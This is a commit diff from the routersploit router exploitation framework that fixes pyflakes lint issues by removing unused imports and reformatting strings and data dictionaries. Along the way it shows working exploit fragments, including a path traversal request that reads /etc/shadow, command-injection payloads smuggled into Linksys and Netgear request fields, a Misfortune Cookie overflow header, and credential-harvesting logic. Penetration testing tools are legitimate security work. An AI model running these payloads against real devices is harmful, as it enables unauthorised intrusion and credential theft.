Skip to content

R
routersploit
Commit 73e8b5cd by fwkz
Options

Fixing pyflakes violations

parent fc4f3d53
Showing with 72 additions and 56 deletions
routersploit/modules/exploits/3com/ap8760_password_disclosure.py
......@@ -4,7 +4,6 @@ from routersploit import (
exploits,
print_status,
print_error,
print_info,
print_success,
print_table,
http_request,
......@@ -20,7 +19,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com AP8760 Password Disclosure',
'description': 'Exploits 3Com AP8760 password disclosure vulnerability. If the target is vulnerable it is possible to fetch credentials for administration user.',
'description': 'Exploits 3Com AP8760 password disclosure vulnerability.'
'If the target is vulnerable it is possible to fetch credentials for administration user.',
'authors': [
'Richard Brain', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
routersploit/modules/exploits/3com/officeconnect_rce.py
......@@ -5,7 +5,6 @@ from routersploit import (
print_error,
print_info,
http_request,
random_text,
mute,
validators,
)
......@@ -22,7 +21,8 @@ class Exploit(exploits.Exploit):
'Andrea Fabizi', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'description': 'Module exploits 3Com OfficeConnect remote command execution vulnerability which allows executing command on operating system level.',
'description': 'Module exploits 3Com OfficeConnect remote command execution '
'vulnerability which allows executing command on operating system level.',
'references': [
'https://www.exploit-db.com/exploits/9862/',
],
......
routersploit/modules/exploits/asmax/ar_804_gu_rce.py
......@@ -4,7 +4,6 @@ from routersploit import (
print_status,
print_error,
http_request,
random_text,
mute,
validators,
)
......
routersploit/modules/exploits/cisco/dpc2420_info_disclosure.py
from routersploit import (
exploits,
print_success,
print_status,
print_error,
print_info,
http_request,
......@@ -17,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Cisco DPC2420 Info Disclosure',
'description': 'Module exploits Cisco DPC2420 information disclosure vulnerability which allows reading sensitive information from the configuration file.',
'description': 'Module exploits Cisco DPC2420 information disclosure vulnerability '
'which allows reading sensitive information from the configuration file.',
'authors': [
'Facundo M. de la Cruz (tty0) <fmdlc[at]code4life.com.ar>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
routersploit/modules/exploits/cisco/unified_multi_path_traversal.py
from routersploit import (
exploits,
print_success,
print_status,
print_error,
print_info,
http_request,
......@@ -12,12 +11,14 @@ from routersploit import (
class Exploit(exploits.Exploit):
"""
Exploit implementation for Path Traversal vulnerability in Cisco Unified Communications Manager, Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices.
Exploit implementation for Path Traversal vulnerability in Cisco Unified Communications Manager,
Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices.
If the target is vulnerable it allows to read files from the filesystem.
"""
__info__ = {
'name': 'Cisco Unified Multi Path Traversal',
'description': 'Module exploits path traversal vulnerability in Cisco Unified Communications Manager, Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices.'
'description': 'Module exploits path traversal vulnerability in Cisco Unified Communications Manager, '
'Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices.'
'If the target is vulnerable it allows to read files from the filesystem.',
'authors': [
'Facundo M. de la Cruz (tty0) <fmdlc[at]code4life.com.ar>', # vulnerability discovery
......
routersploit/modules/exploits/dlink/dsl_2640b_dns_change.py
......@@ -2,7 +2,6 @@ from routersploit import (
exploits,
print_error,
print_status,
print_info,
print_success,
http_request,
mute,
......
routersploit/modules/exploits/dlink/dsl_2730b_2780b_526b_dns_change.py
......@@ -2,7 +2,6 @@ from routersploit import (
exploits,
print_error,
print_status,
print_info,
print_success,
http_request,
mute,
......
routersploit/modules/exploits/dlink/dsl_2740r_dns_change.py
......@@ -2,7 +2,6 @@ from routersploit import (
exploits,
print_error,
print_status,
print_info,
print_success,
http_request,
mute,
......
routersploit/modules/exploits/dlink/dvg_n5402sp_path_traversal.py
......@@ -30,14 +30,25 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.address) # target address
port = exploits.Option(8080, 'Target port') # default port
filename = exploits.Option('/etc/shadow', 'File to read') # file to read
def run(self):
# address and parameters
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../..{}".format(self.filename), "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
data = {
"getpage": "html/index.html",
"*errorpage*": "../../../../../../../../../../..{}".format(self.filename),
"var%3Amenu": "setup",
"var%3Apage": "connected",
"var%": "",
"objaction": "auth",
"%3Ausername": "blah",
"%3Apassword": "blah",
"%3Aaction": "login",
"%3Asessionid": "abcdefgh"
}
# connection
response = http_request(method="POST", url=url, data=data)
......
routersploit/modules/exploits/dlink/multi_hnap_rce.py
from routersploit import (
exploits,
print_success,
print_status,
print_error,
http_request,
......
routersploit/modules/exploits/huawei/e5331_mifi_info_disclosure.py
......@@ -2,8 +2,6 @@ import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
print_table,
http_request,
......@@ -19,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Huawei E5331 Info Disclosure',
'description': 'Module exploits information disclosure vulnerability in Huawei E5331 MiFi Mobile Hotspot devices. If the target is vulnerable it allows to read sensitive information.',
'description': 'Module exploits information disclosure vulnerability in Huawei E5331 MiFi Mobile Hotspot'
'devices. If the target is vulnerable it allows to read sensitive information.',
'authors': [
'J. Greil https://www.sec-consult.com', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
routersploit/modules/exploits/huawei/hg530_hg520b_password_disclosure.py
......@@ -2,7 +2,6 @@ import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
print_info,
......@@ -19,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Huawei HG530 & HG520b Password Disclosure',
'description': 'Module exploits password disclosure vulnerability in Huawei HG530 and HG520b devices. If the target is vulnerable it allows to read credentials.',
'description': 'Module exploits password disclosure vulnerability in Huawei HG530 and HG520b devices.'
'If the target is vulnerable it allows to read credentials.',
'authors': [
'Fady Mohamed Osman (@fady_osman)', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
routersploit/modules/exploits/huawei/hg866_password_change.py
import re
from routersploit import (
exploits,
print_status,
......@@ -18,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Huawei HG866 Password Cahnge',
'description': 'Module exploits password change vulnerability in Huawei HG866 devices. If the target is vulnerable it allows to change administration password.',
'description': 'Module exploits password change vulnerability in Huawei HG866 devices.'
'If the target is vulnerable it allows to change administration password.',
'authors': [
'hkm', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
routersploit/modules/exploits/linksys/1500_2500_rce.py
import re
from routersploit import (
exploits,
print_success,
......@@ -19,7 +17,9 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Linksys E1500/E2500',
'description': 'Module exploits remote command execution in Linksys E1500/E2500 devices. Diagnostics interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
'description': 'Module exploits remote command execution in Linksys E1500/E2500 devices.'
'Diagnostics interface allows executing root privileged shell commands is '
'available on dedicated web pages on the device.',
'authors': [
'Michael Messner', # vulnerability discovery
'Esteban Rodriguez (n00py)', # routersploit module
......@@ -57,9 +57,19 @@ class Exploit(exploits.Exploit):
def execute(self, cmd):
url = "{}:{}/apply.cgi".format(self.target, self.port)
data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1"}
data = {
"submit_button": "Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"action": "",
"commit": "0",
"ping_ip": "127.0.0.1",
"ping_size": "&" + cmd,
"ping_times": "5",
"traceroute_ip": "127.0.0.1"
}
response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
return ""
@mute
......@@ -67,7 +77,18 @@ class Exploit(exploits.Exploit):
mark = random_text(32)
cmd = "echo {}".format(mark)
url = "{}:{}/apply.cgi".format(self.target, self.port)
data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }
data = {
"submit_button":
"Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"action": "",
"commit": "0",
"ping_ip": "127.0.0.1",
"ping_size": "&" + cmd,
"ping_times": "5",
"traceroute_ip": "127.0.0.1"
}
response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
if response is None:
......
routersploit/modules/exploits/multi/heartbleed.py
import re
import socket
import struct
import time
......@@ -9,7 +8,6 @@ from routersploit import (
print_status,
print_error,
print_success,
print_info,
mute,
)
......
routersploit/modules/exploits/multi/misfortune_cookie.py
......@@ -6,7 +6,6 @@ from routersploit import (
print_error,
http_request,
mute,
validators,
)
......@@ -144,12 +143,16 @@ class Exploit(exploits.Exploit):
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie' : 'C' + str(number) + '=' + 'B' * offset + '\x00'}
'Cookie': 'C' + str(number) + '=' + 'B' * offset + '\x00'}
response = http_request(method="GET", url=url, headers=headers)
if response is not None and response.status_code <= 302:
print_success("Seems good but check " + "{}:{}".format(self.target, self.port) + " using your browser to verify if authentication is disabled or not.")
print_success(
"Seems good but check "
+ "{}:{}".format(self.target, self.port)
+ " using your browser to verify if authentication is disabled or not."
)
return True
else:
print_error("Failed.")
......
routersploit/modules/exploits/multi/ssh_auth_keys.py
......@@ -24,7 +24,7 @@ class Exploit(exploits.Exploit):
'Cristiano Maruti (@cmaruti)', # Baracuda Load Balancer vulnerabiltiy discovery
'Jasper Greve', # Ceragon FibeAir IP-10 vulnerability doscovery
'HD Moore', # Ceragon FibeAir IP-10 vulnerability discovery
'Matta Consulting' , # F5 BigIP
'Matta Consulting', # F5 BigIP
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
......@@ -52,7 +52,7 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target IP address e.g. 192.168.1.1') # target address
target = exploits.Option('', 'Target IP address e.g. 192.168.1.1', validators=validators.address) # target address
private_keys = [
{ # quantum dxi v1000
......
routersploit/modules/exploits/multi/tcp_32764_info_disclosure.py
......@@ -4,10 +4,8 @@ import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
print_info,
print_table,
random_text,
mute,
......@@ -69,14 +67,14 @@ class Exploit(exploits.Exploit):
conf = self.execute(s, 1)
lines = re.split("\x00|\x01", conf)
pattern = re.compile('user(name)?|password|login');
pattern = re.compile('user(name)?|password|login')
credentials = []
for line in lines:
try:
(var, value) = line.split("=")
if len(value)>0 and pattern.search(var):
if len(value) > 0 and pattern.search(var):
credentials.append((var, value))
except ValueError:
pass
......@@ -86,10 +84,9 @@ class Exploit(exploits.Exploit):
else:
print_error("Target is not vulnerable")
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
s.send(header + payload +"\x00")
s.send(header + payload + "\x00")
r = s.recv(0xC)
while len(r) < 0xC:
......
routersploit/modules/exploits/multi/tcp_32764_rce.py
......@@ -6,7 +6,6 @@ from routersploit import (
print_status,
print_error,
print_success,
print_info,
random_text,
mute,
)
......@@ -65,7 +64,6 @@ class Exploit(exploits.Exploit):
else:
print_error("Target is not vulnerable")
def command_loop(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
......@@ -82,7 +80,7 @@ class Exploit(exploits.Exploit):
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
s.send(header + payload +"\x00")
s.send(header + payload + "\x00")
r = s.recv(0xC)
while len(r) < 0xC:
......
routersploit/modules/exploits/netgear/multi_rce.py
......@@ -74,7 +74,7 @@ class Exploit(exploits.Exploit):
"001122334455 -c 0 ;{}; echo #".format(self.target, self.port, self.valid_resource, cmd))
# blind command injection
response = http_request(method="GET", url=url)
http_request(method="GET", url=url)
return ""
@mute
......
routersploit/modules/exploits/shuttle/915wm_dns_change.py
......@@ -2,7 +2,6 @@ from routersploit import (
exploits,
print_error,
print_status,
print_info,
print_success,
http_request,
mute,
......
routersploit/modules/exploits/thomson/twg849_info_disclosure.py
......@@ -3,10 +3,8 @@ from routersploit import (
exploits,
print_success,
print_error,
print_info,
print_status,
print_table,
http_request,
mute,
validators,
)
......@@ -32,7 +30,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target IP address e.g. 192.168.1.1')
target = exploits.Option('', 'Target IP address e.g. 192.168.1.1', validators=validators.address)
oids = { # make, model, software version
"model": "1.3.6.1.2.1.1.1.0",
......
routersploit/modules/exploits/tplink/wdr740nd_wdr740n_backdoor.py
......@@ -6,7 +6,6 @@ from routersploit import (
exploits,
print_success,
print_error,
print_info,
print_status,
http_request,
mute,
......
routersploit/modules/exploits/zte/f460_f660_backdoor.py
import re
import string
from routersploit import (
exploits,
......@@ -55,7 +54,6 @@ class Exploit(exploits.Exploit):
print_info(self.execute(cmd))
def execute(self, cmd):
url = "{}:{}/web_shell_cmd.gch".format(self.target, self.port)
headers = {u'Content-Type': u'multipart/form-data'}
......
routersploit/modules/scanners/autopwn.py
......@@ -36,9 +36,9 @@ class Exploit(exploits.Exploit):
path = 'exploits'
modules = []
for device in listdir(rootpath+path): # TODO refactor this, using load_modules() from core
for device in listdir(rootpath + path): # TODO refactor this, using load_modules() from core
if not device.endswith(".py") and not device.endswith(".pyc"):
for f in listdir(rootpath+path + "/" + device):
for f in listdir(rootpath + path + "/" + device):
if f.endswith(".py") and f != "__init__.py":
modules.append(device + "/" + f[:-3])
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment